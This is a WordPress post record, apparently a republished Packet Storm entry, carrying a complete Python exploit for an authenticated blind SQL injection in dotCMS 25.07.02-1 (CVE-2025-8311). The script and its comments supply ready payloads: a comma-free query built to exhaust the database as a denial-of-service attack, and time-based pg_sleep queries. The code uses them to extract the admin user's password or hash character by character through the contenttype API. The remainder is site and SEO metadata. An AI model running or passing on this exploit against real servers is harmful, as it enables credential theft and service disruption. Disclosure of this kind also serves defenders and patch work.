{"id":24494,"date":"2025-11-03T11:50:08","date_gmt":"2025-11-03T11:50:08","guid":{"rendered":"http:\/\/localhost\/?p=24494"},"modified":"2025-11-03T11:50:08","modified_gmt":"2025-11-03T11:50:08","slug":"dotcms-250702-1-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=24494","title":{"rendered":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-03T16:54:00&#8243;,&#8221;description&#8221;:&#8221;dotCMS&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211125&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8311&#8243;],&#8221;sourceData&#8221;:&#8221;#!\/usr\/bin\/env python3\\n    \\n    # Exploit Title: dotCMS 25.07.02-1 &#8211; Authenticated Blind SQL Injection\\n    # Google Dork: N\/A\\n    # Date: 2025-09-09\\n    # Exploit Author: Matan Sandori (OSCP, OSEP, OSWE)\\n    # Vendor Homepage:*https:\/\/www.dotcms.com\/\\n    # Software Link: https:\/\/github.com\/dotCMS\/core\/releases\/tag\/v25.07.02-1 (tested on: v25.07.02-1)\\n    # Version: Affects 24.03.22 and later (see vendor advisory for fixed versions)\\n    # Tested on: dotCMS v25.07.02-1 (Docker \/ Linux)\\n    # CVE: CVE-2025-8311\\n    \\n    \\n    # The application blocks the comma character, so a simple DoS payload like:\\n    # &#8216;) AND 1=(SELECT 1 FROM generate_series(1,500000) AS a CROSS JOIN generate_series(1,500000) AS b) AND (&#8216;FYHh&#8217; LIKE &#8216;FYHh\\n    # will not work.\\n    \\n    # Instead, a comma-free payload can be used, for example:\\n    # &#8216;) AND 1=(WITH RECURSIVE nums(i) AS (SELECT 1 UNION ALL SELECT i + 1 FROM nums WHERE i \\u003c 1000000) SELECT MIN(1) FROM nums AS a CROSS JOIN nums AS b) AND (&#8216;A&#8217; LIKE &#8216;A\\n    \\n    # Example query for time-based extraction of data:\\n    # &#8216;) AND 1=(SELECT CASE WHEN (substring(emailaddress from 1 for 1)=&#8217;a&#8217;) THEN (SELECT 1 FROM pg_sleep(10) WHERE firstname=&#8217;Admin&#8217;) ELSE 1 END FROM user_ WHERE firstname=&#8217;Admin&#8217;) AND (&#8216;1&#8217; LIKE &#8216;1\\n    \\n    # This PoC demonstrates time-based blind SQLi. Error-based SQLi is also possible and allows faster data extraction.\\n    # Using sqlmap with the &#8211;no-cast flag is recommended, as it will not work otherwise.\\n    \\n    import sys\\n    import time\\n    import string\\n    import urllib3\\n    import requests\\n    \\n    ### User configuration\\n    HOST=\\&#8221;127.0.0.1:8443\\&#8221;;\\n    TARGET_ACCOUNT = \\&#8221;admin@dotcms.com\\&#8221;;\\n    SLEEP_TIME=10;\\n    TOKEN=\\&#8221;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhcGk0ZjFhNGYyMi1lYzI5LTQ4OTUtYTBlYi1jYjRkYjEzOGQ2MDAiLCJ4bW9kIjoxNzUxOTQzOTEwMDAwLCJuYmYiOjE3NTE5NDM5MTAsImlzcyI6ImRvdGNtc19kZXYiLCJsYWJlbCI6InRva2VuIiwiZXhwIjoxODQ2NjQxNjAxLCJpYXQiOjE3NTE5NDM5MTAsImp0aSI6IjMyNjIxYmRkLTNhYjEtNGRiMi1iNjEyLWMzMDg5M2EyODBiZSJ9.jqXkfM4Itxy_q2kA10srcL_3NBBx6keXx2PM0mESPFI\\&#8221;;\\n    CHARS = string.printable;\\n    \\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning);\\n    \\n    def encode_all_characters(string):\\n        return \\&#8221;\\&#8221;.join(\\&#8221;%{0:0\\u003e2x}\\&#8221;.format(ord(char)) for char in string);\\n    \\n    def send_request(payload=\\&#8221;\\&#8221;):\\n        payload = encode_all_characters(payload);\\n        burp0_url = f\\&#8221;https:\/\/{HOST}\/api\/v1\/contenttype?filter=LCKwsF\\u0026page=774232\\u0026per_page=517532\\u0026orderby=wDdAmr\\u0026direction=DESC\\u0026type=DOTASSET\\u0026host=BBadoI\\u0026sites=PoC{payload}\\&#8221;;\\n        burp0_headers = {\\&#8221;Accept-Encoding\\&#8221;: \\&#8221;gzip, deflate, br\\&#8221;, \\&#8221;Accept\\&#8221;: \\&#8221;*\/*\\&#8221;, \\&#8221;Accept-Language\\&#8221;: \\&#8221;en-US;q=0.9,en;q=0.8\\&#8221;, \\&#8221;User-Agent\\&#8221;: \\&#8221;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/138.0.0.0 Safari\/537.36\\&#8221;, \\&#8221;Connection\\&#8221;: \\&#8221;close\\&#8221;, \\&#8221;Cache-Control\\&#8221;: \\&#8221;max-age=0\\&#8221;, \\&#8221;Authorization\\&#8221;: f\\&#8221;Bearer {TOKEN}\\&#8221;};\\n        return requests.get(burp0_url, headers=burp0_headers, verify=False);\\n    \\n    def send_sqli(q):\\n        query = \\&#8221;&#8216;) AND 1=(\\&#8221; + q + \\&#8221;) AND (&#8216;A&#8217; LIKE &#8216;A\\&#8221;;\\n        return send_request(query);\\n    \\n    def test_sqli():\\n        print(\\&#8221;[!] Checking target responsiveness&#8230;\\&#8221;)\\n        r = send_request();\\n    \\n        if &#8216;{\\&#8221;entity\\&#8221;:[],\\&#8221;errors\\&#8221;:[],\\&#8221;i18nMessagesMap\\&#8221;:{},\\&#8221;messages\\&#8221;:[],\\&#8221;pagination\\&#8221;:{\\&#8221;currentPage\\&#8221;:&#8217; not in r.text:\\n            print(\\&#8221;[-] Target did NOT return the expected JSON structure. Exiting.\\&#8221;);\\n            sys.exit(1);\\n       \\n        print(\\&#8221;[+] Target responded correctly.\\\\n\\&#8221;);\\n    \\n        r = send_sqli(f\\&#8221;SELECT 1 FROM PG_SLEEP({SLEEP_TIME})\\&#8221;);\\n    \\n        if (not r.elapsed.total_seconds() \\u003e= SLEEP_TIME):\\n            print(\\&#8221;[-] Target did not pause as expected; Exiting.\\&#8221;);\\n            sys.exit(1);\\n    \\n    \\n    def retrieve_password(TEMPLATE, CHARS):\\n        CHARS = \\&#8221;:\\&#8221; + CHARS.replace(\\&#8221;:\\&#8221;, &#8221;);\\n        output = \\&#8221;\\&#8221;;\\n        index = 1;\\n    \\n        while True:\\n            for character in CHARS:\\n                query = str(TEMPLATE).replace(\\&#8221;[_INDEX_PLACEHOLDER_]\\&#8221;, str(index)).replace(\\&#8221;[_ASCII_PLACEHOLDER_]\\&#8221;, str(ord(character)));\\n           \\n                r = send_sqli(query);\\n           \\n                if (r.elapsed.total_seconds() \\u003e= SLEEP_TIME):\\n                    print(f\\&#8221;[+] Found character: {character}\\&#8221;);\\n                    index += 1;\\n                    output += character;\\n                    break;\\n            else:\\n                break;\\n    \\n        return output;\\n    \\n    test_sqli();\\n    \\n    print(\\&#8221;[+] Target is Vulnerable to SQL Injection.\\\\n\\&#8221;);\\n    \\n    TEMPLATE = f\\&#8221;SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) THEN (SELECT 1 FROM pg_sleep({SLEEP_TIME \/ 2}) WHERE emailaddress = &#8216;{TARGET_ACCOUNT}&#8217;) ELSE 1 END) from user_ where emailaddress = &#8216;{TARGET_ACCOUNT}&#8217;\\&#8221;;\\n    \\n    password = retrieve_password(TEMPLATE, CHARS);\\n    \\n    print(f\\&#8221;[+] Retrieved hash\/password for {TARGET_ACCOUNT}: {password}\\&#8221;);&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/211125&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.4,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/211125\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-03T16:54:00&#8243;,&#8221;description&#8221;:&#8221;dotCMS&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211125&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8311&#8243;],&#8221;sourceData&#8221;:&#8221;#!\/usr\/bin\/env python3\\n \\n # Exploit Title: dotCMS 25.07.02-1 &#8211; Authenticated Blind SQL Injection\\n # Google Dork: N\/A\\n # Date: 2025-09-09\\n #&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-24494","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=24494\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-03T16:54:00&#8243;,&#8221;description&#8221;:&#8221;dotCMS&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211125&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8311&#8243;],&#8221;sourceData&#8221;:&#8221;#!\/usr\/bin\/env python3n n # Exploit Title: dotCMS 25.07.02-1 &#8211; Authenticated Blind SQL Injectionn # Google Dork: N\/An # Date: 2025-09-09n #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=24494\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-03T11:50:08+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125\",\"datePublished\":\"2025-11-03T11:50:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494\"},\"wordCount\":795,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.4\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24494#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494\",\"name\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-03T11:50:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24494\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24494#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=24494","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-03T16:54:00&#8243;,&#8221;description&#8221;:&#8221;dotCMS&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-03T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211125&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8311&#8243;],&#8221;sourceData&#8221;:&#8221;#!\/usr\/bin\/env python3n n # Exploit Title: dotCMS 25.07.02-1 &#8211; Authenticated Blind SQL Injectionn # Google Dork: N\/An # Date: 2025-09-09n #...","og_url":"https:\/\/zero.redgem.net\/?p=24494","og_site_name":"zero redgem","article_published_time":"2025-11-03T11:50:08+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=24494#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=24494"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125","datePublished":"2025-11-03T11:50:08+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=24494"},"wordCount":795,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.4","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=24494#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=24494","url":"https:\/\/zero.redgem.net\/?p=24494","name":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-03T11:50:08+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=24494#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=24494"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=24494#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:211125"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24494","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24494"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24494\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}